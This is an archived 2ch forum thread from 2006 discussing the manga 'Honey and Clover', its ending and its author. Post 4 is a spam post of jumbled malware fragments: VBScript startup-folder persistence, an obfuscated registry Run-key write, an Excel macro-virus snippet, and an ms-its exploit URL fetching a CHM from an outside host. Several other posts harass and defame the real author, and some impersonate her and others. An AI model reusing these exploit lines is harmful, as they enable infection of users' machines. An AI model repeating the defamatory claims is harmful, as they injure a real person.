5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その60

1 :花と名無しさん:2006/12/08(金) 01:19:38 ID:???P
◆ コミックス第10巻…9月8日発売 ◆
◆ アニメ第2部…放送終了 ◆
◆ 映画…一部上映中 ◆
※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※
★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※
★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※
★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※
≪前スレ≫
羽海野チカ「ハチミツとクローバー」その59
http://comic6.2ch.net/test/read.cgi/gcomic/1160325457/
★ 過去ログ保管庫
http://www.geocities.jp/hachikuro2ch/
関連スレ,頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2006/12/08(金) 01:20:58 ID:???P
<<関連スレ>>
アニメ板
ハチミツとクローバー II chapter.5 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1156676761/
アニメ2板
ハチミツとクローバー chapter.15 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime2/1151432641/
映画板
【櫻井翔】ハチミツとクローバー4冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1155394779/

3 :花と名無しさん:2006/12/08(金) 01:22:04 ID:???P
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :<body onload=window()>:2006/12/08(金) 07:49:44 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

5 :花と名無しさん:2006/12/08(金) 16:32:49 ID:TZKy0f9I0

羽海野チカさん、スラダンホモ同人時代よくご一緒したけど口臭がものすごくキツかった…
なんていうか、息がウンコのニオイなんだよね
最初は病気かな?と心配したけれど日記とかみてるとたぶんコーヒーの飲み過ぎなんだと思う
もう少しマメに歯磨きして、ブレスケアか何か飲んだらいいのに…
口臭がウンコってキツイ。



6 :花と名無しさん:2006/12/08(金) 16:33:22 ID:TZKy0f9I0
サイゾーの記事の内容がここのサイトが詳しかった。↓

ttp://www.st.rim.or.jp/~nmisaki/ > ■文化庁著作権課が同人誌と著作権についてコメント。
>  そして、「サイゾー6月号」でもうひとつの記事を話題としたい。
> 「偉人・奇人日本代表!」と称した特集で羽海野チカを取り上げている。
> 「人気漫画家のエロエロやおい本を大公開!!」というアオリもアイタタだが、
> 彼女のスラムダンク時代の同人誌をわざわざ井上雄彦に見せてコメントを取ろうと
> いう頭痛のするような企画。

長いので全文引用はしないが(詳しく知りたい人は該当ページに飛んでください)

簡単にまとめると
・サイゾーライターがウミノさんが描いたスラムダンクのエロヤオイ同人誌を
 井上雄彦に送りつけて感想を聞くという企画をする。
・集英社は井上雄彦へエロヤオイ同人誌を渡すのを断る。
・が、講談社は、井上雄彦にエロヤオイ同人誌を渡してしまう。
・井上雄彦側からは、感想も本を読んだかどうかも完全にノーコメント。
・サイゾーは同人誌とは著作権侵害じゃないのかと「文化庁著作権課」に問い合わせた。

7 :花と名無しさん:2006/12/08(金) 16:34:00 ID:TZKy0f9I0
海膿野のホモ同人(18禁)は
原案○○ちゃんと書いてあって
○○ちゃんに海野が「もうやめようよ〜恥ずかしいよ〜///」
みたいにぶりっ子ぶったシーンが書かれていた。
フェラだのモロがっちゅんだのをノリノリで書いてるくせに
誰かに無理矢理書かされたみたいな逃げ道をしっかり用意してあって、
なんだかなあと当時思ったよ。

18禁ドジンシは、エンピツで書いた雑な漫画だったよ
それでも今10万超える値が付いてんだもんな

その一冊だけ出した18禁本に
フェラと挿入はしっかり描いてあったな

スラムダンク花形×藤真のエロ本。

8 :花と名無しさん:2006/12/09(土) 03:00:29 ID:???0
自分はスラダン好きから知ったんだけど
うちにあるんだけど。高値で売れるなら売ろうかな

9 :花と名無しさん:2006/12/09(土) 09:21:53 ID:Jduyri5O0
だから10万円なんてウソだって。

中古同人誌屋では1万円切ってるよ。

高値で売り捌きたければ、ヤフオクで中身の画像をちょっと晒して、
【レア!】と煽れ。

10 :花と名無しさん:2006/12/09(土) 19:00:54 ID:???0
>>3
映画版でも姪じゃなくてイトコの娘だったよ。

11 :花と名無しさん:2006/12/09(土) 23:00:13 ID:???0
映画の公式HP上では「花本先生の姪」となっているけど

12 :花と名無しさん:2006/12/10(日) 01:02:00 ID:???0
ウミノさんの同人たくさんもってるけどあれのどこがエロなのよww
今時小学生だってもっとすごいの読んでるよw

13 :花と名無しさん:2006/12/10(日) 07:14:01 ID:???O
少女漫画読んでる人でやたら潔癖なのって処女とか童貞?
余りにエロを嫌悪すると逆にちょっと気持ち悪く感じる。

14 :花と名無しさん:2006/12/10(日) 17:10:04 ID:???0
訳:わたしふとってるけど
コニーよりはスマートじゃないのさ!!

15 :花と名無しさん:2006/12/10(日) 23:27:52 ID:RaXnC4cOO
アンチ乙。
同人時代なんぞ知らんが、わざわざ言うあたり、逆に自慢したいのか?
メジャーになったバンドを「インディーズ時代から知ってる!」というシッタカ情報に似ている。
オクで値を釣り上げたいのか?意図不明だな。

16 :花と名無しさん:2006/12/10(日) 23:53:09 ID:???0
今更自慢も何もないだろ

17 :花と名無しさん:2006/12/11(月) 00:10:17 ID:MNOCZEad0
有名すぎて(同人誌時代)、自慢にもなんにもならない件。

18 :花と名無しさん:2006/12/11(月) 02:14:10 ID:t8Z2R+9G0
>>13
処女童貞だから潔癖だっていうのも単細胞的発想っていうか…
それじゃ経産婦は皆下ネタ大好きかってことになるじゃん

作風にあわないのに下ネタが混ざってたら
トホホ〜て思うけどね。

19 :花と名無しさん:2006/12/11(月) 02:27:12 ID:???O
>11
みんなに紹介するシーンのセリフで、
「いとこの娘」とはっきり言ってるから
公式ホームページが間違ってるでいいと思う。

20 :花と名無しさん:2006/12/11(月) 10:46:21 ID:???0
NANAの後編もコケ按配。
ハチクロももう花火はシケて終わってしまった。
来年また面白いマンガが出てくれることを期待。
今年は、売れてるマンガを消費し尽くした年だった。

21 :花と名無しさん:2006/12/11(月) 11:23:24 ID:???0
>>10,11,19
じゃあテンプレ修正ってことで。

Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画公式サイトでは姪と誤記されています。

22 :花と名無しさん:2006/12/11(月) 11:40:01 ID:???O
>>21
いとこの娘のことを姪って言うんだよ。
頭大丈夫?

23 :花と名無しさん:2006/12/11(月) 11:56:13 ID:???0
>>22
いわないよ
大丈夫?

24 :花と名無しさん:2006/12/11(月) 12:06:31 ID:???O
姪や甥…本人にとって血縁や婚姻により兄弟姉妹にあたる人の子供までだったと思うが。
いとこ…本人にとって血縁や婚姻による両親の、兄弟姉妹の子供同士の関係。
修司のいとこの娘って、いわゆる遠縁なのでは。

25 :花と名無しさん:2006/12/11(月) 12:07:44 ID:UdIxAY2YO
>>22
wwwwwwwww
大丈夫?

26 :花と名無しさん:2006/12/11(月) 12:57:26 ID:Obw6uGOEO
22:花と名無しさん :2006/12/11(月) 11:40:01 ID:???O
>>21
いとこの娘のことを姪って言うんだよ。
頭大丈夫?



wwwwwwwwww

27 :花と名無しさん:2006/12/11(月) 13:02:44 ID:n+cHqtzPO
>>22
ププー!!

28 :花と名無しさん:2006/12/11(月) 13:27:35 ID:???0
そろそろ>>22の釣り宣言がくるかな?

29 :名無し:2006/12/12(火) 10:41:46 ID:???O
同人してた時期を恥じないと無理ずら。ウミノみたく商業デビュ後も同人時代気分で痛い発言してちゃ。巻末漫画でよくオタクだオタクじゃないだいうけどチミの過去は同人女なのにオタクも何も・・何を今更。

30 :花と名無しさん:2006/12/12(火) 11:50:35 ID:soTt5tkW0
羽海野は同人時代を恥じてるお。

31 :花と名無しさん:2006/12/12(火) 17:22:44 ID:???O
今日ハチクロ買ったけど…何かもう少女漫画のコーナーがピンク色になってて居るだけで恥ずかしかった。それからしばらくうろうろして勇気を出してレジにダッシュ!!店員は男!!あぁ、もう死んだなって思ったよ女の人でもいやだけど……って感じでハチクロやっと買えた(-Д-`)
文章力なくてごめん

32 :花と名無しさん:2006/12/12(火) 17:52:02 ID:M6XorcyY0
男ってなにがおもろくて
ハチクロとか腐女子のかいたマンガかうの?
萌キャラいたっけ?腐ったお兄さん?
こんなものかう男の存在がしんじられない




33 :花と名無しさん:2006/12/12(火) 18:09:19 ID:???O
いや、普通にアニメがおもしろかったから……
そこまで言わなくても…

34 :花と名無しさん:2006/12/12(火) 18:11:20 ID:???0
買わないよ

35 :花と名無しさん:2006/12/12(火) 18:35:45 ID:qI1w9FIqO
>>32
読ませてあげてよw


>>33
そんな思いしてまで買ったあなたエライよ(わからんけど)
是非、全巻読んでみてください。面白いから。最初だけはww


36 :花と名無しさん:2006/12/12(火) 18:36:31 ID:???O
俺もたまたま深夜になんだこれ?ってアニメ第三話くらいを
見てたら、なかなかおもしろくて買っちゃった。

37 :花と名無しさん:2006/12/12(火) 18:53:26 ID:???O
何を面白がっても良いと思うんだ

38 :花と名無しさん:2006/12/12(火) 20:52:05 ID:xqfeW+lvO
これが面白いとは脳が膿んでるね。

39 :花と名無しさん:2006/12/12(火) 23:41:55 ID:vebwQd7DO
/^o^\フッジサーワ
http://x25.peps.jp/azurenamoon

40 :花と名無しさん:2006/12/12(火) 23:58:10 ID:???O
女は恐い生物だ

41 :花と名無しさん:2006/12/13(水) 01:29:52 ID:???O
いとこの娘=はとこじゃないの?

42 :花と名無しさん:2006/12/13(水) 01:38:39 ID:???0
>>41
はとこって親のいとこの子じゃないの?

43 :花と名無しさん:2006/12/13(水) 02:42:29 ID:???0
いとこの子供同士は、はとこ。
花本先生とはぐみは子供”同士”じゃないでしょ。

44 :花と名無しさん:2006/12/13(水) 09:49:50 ID:???O
>>32
私は男ですが、あなたのその視野狭窄ぶりの方が信じられない

45 :花と名無しさん:2006/12/13(水) 10:04:21 ID:f4c5x6/lO
>>44
キモオタ必死だな。

46 :花と名無しさん:2006/12/13(水) 10:20:50 ID:???O
>>45
朝からいろんな場所で必死だねID:f4c5x6/lO
ププッ

2:花と名無しさん :2006/12/13(水) 09:23:24
ID:f4c5x6/lO
はぁ?チョンウゼーぞ。

548:花と名無しさん :2006/12/13(水) 09:28:15
ID:f4c5x6/lO
>>533
ら抜き言葉みっともないよ。

47 :花と名無しさん:2006/12/13(水) 11:10:28 ID:IgRkVHC3O
>46
ID:f4c5x6/lO
は、他でも湧いてるね
しかも意味のない批判ばかり
能無しの典型
馬鹿晒しage

48 :花と名無しさん:2006/12/13(水) 15:21:36 ID:???0
>>47
おまえキモイよ・・・・・

49 :花と名無しさん:2006/12/13(水) 15:49:19 ID:???0
おもしろかったけど花本先生がはぐに鼻息荒くしてるところは気持ち悪かった
なんか色々考えちゃってゾっとした

50 :花と名無しさん:2006/12/13(水) 16:58:39 ID:KRV8jgPVO
はぐーっ萌えーっw
でもきっと修ちゃんは、はぐに手を出せずじまいでおわるよ。
あんなちっこい子とやれん!


51 :花と名無しさん:2006/12/13(水) 17:15:10 ID:???0
>>50
叩き潰してやる

52 :花と名無しさん:2006/12/13(水) 19:13:57 ID:???O
>>51
ロリコン?


53 :花と名無しさん:2006/12/13(水) 21:15:25 ID:???O
馬鹿多数

54 :花と名無しさん:2006/12/13(水) 21:27:51 ID:???0
はぐがね、あくまで第三者の人形みたいな偶像だったら幼女でまだよかったの。
作者の意思と自我が入ったら、あの扱いがきもちわるくてかなわんの。

55 :花と名無しさん:2006/12/14(木) 05:43:22 ID:???0
胡散臭さを感じたり気持ち悪いと言う人の気持ちはわかる。

ウミノさんが繰り返し描いている
・社会不適合者は才能がある
・未熟であることは無垢
・死を考えるほど何かを想い願う心は純粋

こういう 間 違 い をとことん美化して描いてるから違和感がある。
所詮漫画とわかっていても見ないようにするのは難しい。
被害妄想の強い人物が人生を肯定するのに都合のいい妄想を
自分に言い聞かせながら描いている姿が目に浮かぶんだよね。

56 :花と名無しさん:2006/12/14(木) 10:53:22 ID:???0
>>55
すごくわかる
スキーリした

57 :花と名無しさん:2006/12/14(木) 21:00:07 ID:???O
長すぎて意味分からん
はぐちゃんはいい子

58 :花と名無しさん:2006/12/14(木) 23:41:49 ID:UTETcbtMO
スピンオフって単行本ででる?

59 :花と名無しさん:2006/12/15(金) 03:26:12 ID:???O
確か映画版は遠縁→姪に設定替えしたんじゃなかったっけ?

60 :花と名無しさん:2006/12/15(金) 04:53:27 ID:???0
>>50
はぐの見た目や頭の中が幼いから修×はぐが気持ち悪いわけじゃないんだよ
娘か妹のように接してきた年の離れた親戚の女の子にいきなり発情したのが
気持ち悪いんだよ
ただでさえロリコンでキモイ上に近親相姦的な気持ち悪さも感じてオェェェェ・・・・・・

61 :花と名無しさん:2006/12/15(金) 05:01:40 ID:???0
>>55
>・社会不適合者は才能がある
>・未熟であることは無垢
>・死を考えるほど何かを想い願う心は純粋

これって絶対ではないけどわりとあてはまってること多いような

62 :花と名無しさん:2006/12/15(金) 07:51:00 ID:???0
一部にはあるだろうが全てでは無い。
こういう摩り替えはいじめられっ子の屁理屈でよく見るよ。

63 :花と名無しさん:2006/12/15(金) 09:50:01 ID:???P
ハチクロの終盤辺りの修はぐが、
これまでの伏線的にも、生理的にも
あんまりな展開だったからアンチ化した人が続出なのは分かるけど…
さすがに作者とハチクロの文句垂れ長し過ぎじゃないか?
いじめられっこによく見られる理屈とかいって、
それ一般化出来るほどいじめられっこに接してきたわけ?
四方八方から重箱の隅々まで、舐めるようにあら探しして。
確かにひどい展開だったけど、
別れた恋人の文句を探せるだけ探して言ってる感じでもう言ってる方が醜いよ。
一時は少しでも肯定する書き込みすべて頭が足りないみたいな扱いだったし。
好きだったんだから
そこまでおとしめるようなことしなければいいのに。
まあそんなこんなで
まともに話すことなんてできないくらい
人がいないスレになったんだろうけど。



64 :花と名無しさん:2006/12/15(金) 15:46:59 ID:???0
2ちゃんなんだからクソだけふりに来てナニが悪い?
ミクシには無難なこと書いて、そのウサ晴らしがここでしょ

65 :花と名無しさん:2006/12/15(金) 16:06:28 ID:???O
>>63
まぁ正論だけどね。
ここでぐらいネチネチと愚痴らせてくれや。

66 :花と名無しさん:2006/12/15(金) 16:08:19 ID:???0
47 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 00:12:51 ID:???0
>>26
計算はあるとオモ
若い子向けというよりオタ向けだけど

モノローグ無しの「リカさん人形」はボクの理想を写せる逆らわない穴人形
男と結ばれる事の無いナイスバディ「処女っ娘あゆ」はボクだけが犯れる妹
成人しても容姿はロリ−タ、保護者と離れぬ「成長しないはぐ」は劣化しない幼女

48 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 00:32:55 ID:???0
>>47
妙に納得

この作者はブログを見る限り自身と作品がシンクロしてる
独自の色彩感覚で、今までこの人の闇の部分が見えなかった

50 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 00:42:40 ID:???0
>>47
3人とも、「それ何ってエロゲヒロイン?」ってキャラばかりだもんね。
リカは「綾波系」だし。

51 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 00:55:52 ID:???0
>>47 同意。
ハチクロキャラは男性陣(除森田)が強烈な人間臭さを放っているのに対して
女性陣はまるで「人形(doll)」
他の作品や現実に存在したら確実にヒかれるキャラも、
その「人形」臭さゆえに許されている


67 :花と名無しさん:2006/12/15(金) 16:09:37 ID:???0
56 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 01:22:04 ID:???0
エロゲ仕様エロゲ仕様と言われるけど男の方がよっぽど乙女ゲー仕様じゃないか?
平均以上の男どもから惚れられまくりじゃん。
男の方が想像で描く範囲が大きい分ギャグのはっちゃけっぷりがでかい位で理想キャラなのは男も女も変わらん。。

57 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 01:26:56 ID:???0
乙女ゲー?てのをやったことが無いんであれだが・・・
まぁマンガのキャラなんて往々にして、類型化された人間像の再現だしな

58 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 01:32:38 ID:???0
>>51
男性陣が人間臭いのは作者の好みの人物像がしっかりあって
それに基づいて描いてるからだろうね
女性陣の場合内面を強く出しすぎると反感を買いやすいと判断して
柔らかいモノローグでワンクッションおいて自己主張させているのかもしれない
作者が慎重になりすぎてつまらなくなってしまった

60 名前: 花と名無しさん [sage] 投稿日: 2006/06/20(火) 02:07:15 ID:???0
要するに、

エロゲ+乙女ゲー=ハチクロ

これで八方丸く収まる。

68 :花と名無しさん:2006/12/15(金) 16:53:58 ID:???0
コピペはいらないよ

69 :花と名無しさん:2006/12/15(金) 17:08:03 ID:???0
>>60
わかる・・・
先生がモンゴルかどこかに行った先ではぐの写真を見て泣き暮らしている
所とか、はぐに近づく男子を執拗に排除しようとしている描写が当時から
行き過ぎていてちょっとキモかったんだけど、あくまでも「父性」ゆえと
して描かれていたからなんとかギャグとして受け入れていたのが最後の
先生の発情で「キサマ!!やはりロリ・・・・・・」となってしまった。

なんとなく最後にムリにはぐを少女から女にしよう
不幸な先生に幸せをあたえよう
とゆうのがミックスしてこんな変な展開になってしまったのかなと思った。
まあ先生は(やはり)最後にきていきなりこの世の不幸を全て背負って
大学の生霊と化していたという存在にされてしまってのことだけど。

70 :花と名無しさん:2006/12/15(金) 17:20:50 ID:???0
>>63

そうはいってもさ、本当ならもっともっと素晴らしい作品になるはずだったものを
駄作に引きずり落とした作者の罪は重いんだよ
作品は世に出た時から作者の手を離れ読者のものとなってゆくんだよ
適当な終結をさせて過去の良かった部分まで台無しにした罪はもっともっと叩かれるべきだね

71 :花と名無しさん:2006/12/15(金) 18:33:13 ID:EoeF6BMqO
ん〜(´・ω・`)



72 :ウミノ☆:2006/12/15(金) 18:40:37 ID:y/n08Pqr0
    /\___/ヽ
   /''''''   '''''':::::::\  
  . |  (。),   、(゚)、.:|  あばば・・・あふッ・・・うっ・・・
  |   ,,ノ(、_, )ヽ、,, .::::|  おうッ・・ああッあうあ・・あッ・・・
.   |   mj |=‐ァ'  .::::|
   \,〈__ノニニ´ .:::/
  /ノ  ノ -‐‐一´\






    /\___/ヽ
   /''''''   '''''':::::::\
  . |  (。),   、(゚)、.:|
  |   ,,ノ(、_, )ヽ、,, .::::|    
.   |   ` 、___, '   .::::|  
   \  mj |   .:::/
   /`〈__ノ-‐‐一´\

73 :花と名無しさん:2006/12/15(金) 19:32:45 ID:???0
>>55>>61
作者が腐や厨を引きずってるんじゃない?

グループに属せない→変わり者→人と違う特殊能力者→才能豊かな天才
未熟な半端者→世間に慣れていない→世間擦れしていない→純真無垢
思いつめる=死

シリアスな話も中身無いし軽いし、萌えが臭うし・・・

74 :花と名無しさん:2006/12/15(金) 21:58:13 ID:???P
>>70
確かに、最終回に向けてのハチクロの展開には
かなり期待してた。
こんなに期待したの久しぶりだった。
今までがこんなにいいんだし、
きっと予想のはるか上を行くような神展開が…って、修はぐまでは。
いいもの見付けたと思ってたのに。

こうなったのは悲しいし、
作品を殺した(惨殺)作者の罪は取り返しがつかないと思う。
「所詮漫画、作者の都合で設定や伏線無視だってありますよ?」って
作者自身に漫画を適当に扱われた気分。
ハラ立つ。

けど、さすがに作品にほとんど関係ない叩きが醜すぎるんじゃないかと。
なんかそれは作品が駄目になった憤りと関係ないっつーか
本気で怒ってるこっちの品位を無駄に落とすだけっつーか

あんなことした作者とレベルが同等以下のような気がする。



75 :花と名無しさん:2006/12/16(土) 00:59:12 ID:???O
おまえらしつこいよ
いつまでもネチネチ文句バッカ言ってんじゃねぇよ
こんのバカがぁ

76 :花と名無しさん:2006/12/16(土) 01:40:31 ID:f7mbdQGMO
ばかがぁ〜(´・ω・`)

77 :花と名無しさん:2006/12/16(土) 04:09:56 ID:???0
信者装ったアンチの釣りはいらんDEATH

次回作&燃料投下マダー(・∀・ )っノシ凵 ⌒☆チンチン

78 :花と名無しさん:2006/12/16(土) 05:14:13 ID:???0
>>74
私も最後のテキトウさに打ちのめされた一人
ウミノさんの作品は昔から好きだったからここで同人作家だった
ことをバカにするようなレスを見るたびに腹ただしい気持ちで
いたけど、今回ハチクロの最後を見取って「あ〜・・・・やっぱり
同人作家から抜け出せてないのかなぁ・・・・」と思ってしまった

あんなに同人時代をバカにされるのに怒りを感じてた私が
所詮同人作家なのか・・・・?と思ってしまうほどハチクロの
最後は私にとって安っぽいその場しのぎのようなものだった。

>「所詮漫画、作者の都合で設定や伏線無視だってありますよ?」って
>作者自身に漫画を適当に扱われた気分。
>ハラ立つ。

まったく同感です

79 :花と名無しさん:2006/12/16(土) 06:34:20 ID:YCrfKGO1O
こういう展開だったら・・
修→リカを諦めず真山に挑むとか
森はぐ竹本→みんな別々endだけどどっちかが最後にはぐを迎えに来ることを匂わすとか。
妄想スマソ

80 :花と名無しさん:2006/12/16(土) 10:55:06 ID:???0
だからこここそがホンネ・本当の評判が語られてるんだと思うよ
ミクシィなんか社交辞令ばっかでしょ

81 :羽海野チカ:2006/12/16(土) 11:51:50 ID:???0
そんなに私のマンガに不服あるなら買わなきゃいい
成功した人にシットするなんて最低ですw

82 :花と名無しさん:2006/12/16(土) 12:04:09 ID:???0
×最低ですw
○最低です☆

83 :花と名無しさん:2006/12/16(土) 12:13:17 ID:???0
最後決してテキトウに書いた訳ではなかったと思うよ。
むしろかなり魂込めてたような気がする。
ただ少し感覚が狂ってるだけじゃないかな。
>>55がウミノさんの考えてる事のすべてなんだろう。
>>55も言ってるように明らかに間違いだし
そういう感覚自体がちょっと時代遅れの感が否めない。

84 :花と名無しさん:2006/12/16(土) 14:39:26 ID:???O
文句ばっかのキモバカ野郎はしんじまえっ!!!!

85 :花と名無しさん:2006/12/16(土) 18:24:24 ID:???0
作品に対してはまあ好きな事言ってりゃいいんだろうけど
>>5とかはひでーなw

ここまでいくとコレ書いた(または張った)奴の頭がおかしいとしか思えん。

86 :花と名無しさん:2006/12/16(土) 18:49:14 ID:???O
うみのマンコちかゲロうんこ(・∀・)

87 :花と名無しさん:2006/12/17(日) 00:50:21 ID:???0
>>79
はぐが派手なエアメールを眺めながら微笑んでいると窓の外に気配
顔を映さず汚れた足元だけ
コマを進むと遠くにチラと自転車が見える・・・・・・

おわり( ´ー`)

88 :花と名無しさん:2006/12/17(日) 15:34:58 ID:???O
(´・ω・`)ふんふん
なるほどね〜

89 :花と名無しさん:2006/12/18(月) 00:39:27 ID:5p+qIKso0
なんだかなー

90 :花と名無しさん:2006/12/18(月) 02:08:46 ID:???0
ぬるぽどねー

91 :花と名無しさん:2006/12/18(月) 02:15:51 ID:+M7mD89rO
がっ(´・ω・`)/

92 :花と名無しさん:2006/12/18(月) 03:06:05 ID:???0
>>83>>55

文体からしてどうみても同一人物にしかみえん
だからナニってわけじゃないが



93 :花と名無しさん:2006/12/18(月) 04:23:53 ID:???0

みんな、なんだかんだ言って、結局ハチクロを愛しているんだなぁww




94 :花と名無しさん:2006/12/18(月) 07:07:11 ID:???0

そうじゃなかったらこんなとこ来るために時間割かない...

95 :花と名無しさん:2006/12/18(月) 07:37:24 ID:???O
愛してるから叩いちゃうんだ^^

96 :花と名無しさん:2006/12/18(月) 08:11:25 ID:???O
>92
違うよ、2コだけだよ〜ん(´・ω・`)/

ハチクロ大好きな故の叩きだょね。最後に裏切られたのは痛い。ショックすぎて言わざるをえない。。



97 :花と名無しさん:2006/12/18(月) 10:37:10 ID:vUGmQOklO
裏切りとか言ってる人きもい
ついでに小文字きもい

98 :花と名無しさん:2006/12/18(月) 11:15:42 ID:???0
最初と最後しか読んだ事ないんだけど
何巻が1番面白い?

99 :花と名無しさん:2006/12/18(月) 13:23:23 ID:???O
オレまだ5巻までしか読んでないけど何巻からおかしくなるん?

100 :花と名無しさん:2006/12/18(月) 14:05:04 ID:???0
>>99

8巻中盤くらいから徐々に

9巻で違和感が最大に

10巻で衝撃が待っている



まぁ、「おかしい」って感覚は個人の主観に依るところが大きいし、
一概には言えないんだけどね

101 :花と名無しさん:2006/12/18(月) 16:02:05 ID:47XQKG410
オナニーうみのちか

102 :花と名無しさん:2006/12/18(月) 17:42:41 ID:???O
最後ら辺で自分は結局同人作家の域からは抜けられないって事を
自ら表明しちゃったんだね…

103 :花と名無しさん:2006/12/18(月) 17:56:29 ID:???P
>>55が言ってることって、作品の最初から分かってたことじゃない?
特に、社会不適合者は才能があるとか、
そういう描写何回も出てきてるじゃん。
それでも森田さんもはぐもリカさんも魅力あったと思うよ。
はぐが命かけて泣きながら絵に向かうシーン見て
嫌な気持ちしたの?
問題はそこじゃなくて、
それまでは生き生き動いてたキャラが壊されたことだと思うよ。
修ちゃんは、父親がわり→おむつ変えてやった子に唐突マジ告白やの生臭い男
森田さんは、つかめない芸術的天才、ここぞという時には気配りもできる→弱気あきらめ普通発言で退場
竹本くんは、天才に憧れる凡人、そのなかでの成長→ただのやっかみでいっちゃいけないことを言う男
てなかんじで。

104 :花と名無しさん:2006/12/18(月) 20:10:31 ID:vCg/jfsEO
なにいってんのかわからん

105 :花と名無しさん:2006/12/18(月) 21:12:39 ID:???O
わかりにくくてすまん
もう少し噛み砕いて書いてみる

>>55が挙げているハチクロの気持悪さの原因三つは、
55自身がそう書いているように
作品中に何度も繰り返し描写されていることだ。
1話から既にかかれている。
それが気持悪いなら1話からすでに気持悪いはず。
なぜ1話で読むのをやめなかったのか。
最初のころは、作者が、55が挙げた点を
魅力的に描くことに成功していたからではないか。
はぐも森田さんもちゃんと「社会性がない天才キャラ」として愛されていたではないか。
それがキャラを途中で壊すようなことを作者がしてしまったから、
鼻につくようになったのではないか。
だから問題は、55が挙げた三点を主題にしているということではなく、
キャラを唐突に壊してしまったことではないか、


ということがいいたかった

106 :花と名無しさん:2006/12/18(月) 21:20:47 ID:???0
はぐのはなげは まで読んだ

107 :花と名無しさん:2006/12/18(月) 21:28:15 ID:???P
(.ω.)ごめんね。
7文字より長い文は読めないんだったね。

108 :花と名無しさん:2006/12/18(月) 21:52:49 ID:???O
噛み砕くの意味わかってんのか?オレは知らないけど

109 :花と名無しさん:2006/12/18(月) 22:43:13 ID:???P
なにが言いたいのかわからん

110 :花と名無しさん:2006/12/18(月) 23:55:48 ID:???0
>>105
何度も繰り返すからだよ。
最終話のぐるぐる回る観覧車がなんだか神経症を思わせてねぇ。

111 :名無し:2006/12/19(火) 00:57:22 ID:oOTbYJzKO
ハチクロ大好きです!
すっごい面白いと思います!
てゆうか詞とかも結構
奥が深いというかなんというか‥

112 :花と名無しさん:2006/12/19(火) 01:01:30 ID:JVAUBzPqO
本人のじえんくさくてきしょ

113 :名無し:2006/12/19(火) 01:04:25 ID:oOTbYJzKO
此処はハチクロの悪い点を挙げるスレなのでしょうか?

114 :花と名無しさん:2006/12/19(火) 02:06:10 ID:Oap1co7qO
ちがうよ
ハチクロの良し悪しを語るスレだよ(´・ω・`)

115 :花と名無しさん:2006/12/19(火) 10:24:12 ID:???0
うじうじしてんだよ
それでスッキリしないまま終わったんだよ
うじうじってサイコーみたいなノリで
そんなの誰も望んでなかったんだよね

116 :花と名無しさん:2006/12/19(火) 11:03:26 ID:l0MjPsZBO
スッキリで終わる作品って長い間心に残らない

117 :花と名無しさん:2006/12/19(火) 11:41:31 ID:???O
ハチクロキャラで山田がいちばん好き
野宮が現れて山田の心が揺れて、真山のことをずっと好きで居続けたかったといいつつも野宮にひかれて始めるその辺までが好きだった。
そのあとの山田はキャラ崩壊で見てるとイライラしてしまった。
山田好きなヤツはどう見てる?



118 :花と名無しさん:2006/12/19(火) 14:58:08 ID:???0
>>116
そんな中折れみたいな手段で思い出に残ろうなんて…
カスすぎる

119 :花と名無しさん:2006/12/19(火) 17:00:15 ID:a/cikvY4O
頃していい

120 :高橋佳子:2006/12/19(火) 17:02:58 ID:a/cikvY4O
アニメ企画あったのに海野のせいで駄目になった

121 :高橋佳子:2006/12/19(火) 17:04:59 ID:a/cikvY4O
精神以上です
半座医者いらなければ私の漫画をアニメにしろ
声優は河村隆一だ

122 :高橋佳子:2006/12/19(火) 17:06:09 ID:a/cikvY4O
今日も借金返すから売春してきました

123 :高橋佳子:2006/12/19(火) 17:07:13 ID:a/cikvY4O
